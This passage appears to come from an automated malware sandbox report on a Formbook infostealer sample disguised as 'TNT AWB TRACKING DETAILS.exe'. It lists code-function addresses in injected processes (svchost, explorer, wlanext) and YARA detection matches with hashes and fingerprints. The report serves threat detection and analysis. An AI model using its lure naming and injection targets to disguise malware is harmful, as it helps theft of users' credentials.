          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384A036
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384B232
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03841082
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E5CD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03845B30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03845B32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03848912
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03842D02
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1B5B32
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1B5B30
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1BB232
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1B8912
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1B2D02
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1BE5CD
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1BA036
Source: C:\Windows\explorer.exe | Code function: 3_2_0B1B1082
Source: C:\Windows\explorer.exe | Code function: 3_2_10C71232
Source: C:\Windows\explorer.exe | Code function: 3_2_10C67082
Source: C:\Windows\explorer.exe | Code function: 3_2_10C70036
Source: C:\Windows\explorer.exe | Code function: 3_2_10C745CD
Source: C:\Windows\explorer.exe | Code function: 3_2_10C68D02
Source: C:\Windows\explorer.exe | Code function: 3_2_10C6E912
Source: C:\Windows\explorer.exe | Code function: 3_2_10C6BB32
Source: C:\Windows\explorer.exe | Code function: 3_2_10C6BB30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039A03E6
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038EE3F0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399A352
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039602C0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03980274
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039A01AA
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039941A2
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039981CC
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038D0100
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0397A118
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03968158
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03972000
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038DC7C0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03904750
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E0770
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038FC6E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039A0591
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E0535
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0398E4F6
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03984420
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03992446
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03996BD7
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399AB40
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038DEA80
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E29A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039AA9A6
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038F6962
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038C68B8
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0390E8F0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E2840
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038EA840
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0395EFA0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038D2FC8
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038ECFE0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03900F30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03982F30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03922F28
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03954F40
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399CE93
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038F2E90
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399EEDB
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399EE26
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E0E59
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038F8DBF
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038DADE0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0397CD1F
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038EAD00
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03980CB5
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038D0CF2
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E0C00
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0392739A
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399132D
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038CD34C
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E52A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038FB2C0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039812ED
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038EB1B0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039AB16B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0391516C
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038CF172
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E70C0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0398F0CC
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039970E9
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399F0E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399F7B0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039916CC
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03925630
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0397D5B0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_039A95C3
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03997571
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399F43F
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038D1460
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038FFB80
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03955BF0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0391DBF9
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399FB76
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03925AA0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0397DAAC
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03981AA3
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0398DAC6
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399FA49
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03997A46
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03953A6C
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03975910
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E9950
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038FB950
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E38E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0394D800
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E1F92
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399FFB1
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038A3FD2
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038A3FD5
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399FF09
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E9EB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038FFDC0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03991D5A
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038E3D40
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03997D73
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0399FCF2
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03959C32
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EE61E
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EE639
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030D2FB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030D9E1A
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030D9E60
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EEE60
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030D2D88
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030D2D90
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0368A036
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03685B30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03685B32
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0368B232
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03688912
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03681082
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03682D02
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0368E5CD
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0394EA12 appears 86 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 03927E54 appears 110 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 006F650B appears 96 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0395F290 appears 105 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 038CB970 appears 280 times
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 03915130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 110 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: String function: 00445AE0 appears 65 times
Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1450642019.000000000467D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TNT AWB TRACKING DETAILS.exe
Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000044D3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TNT AWB TRACKING DETAILS.exe
Source: TNT AWB TRACKING DETAILS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3861610506.0000000010C89000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
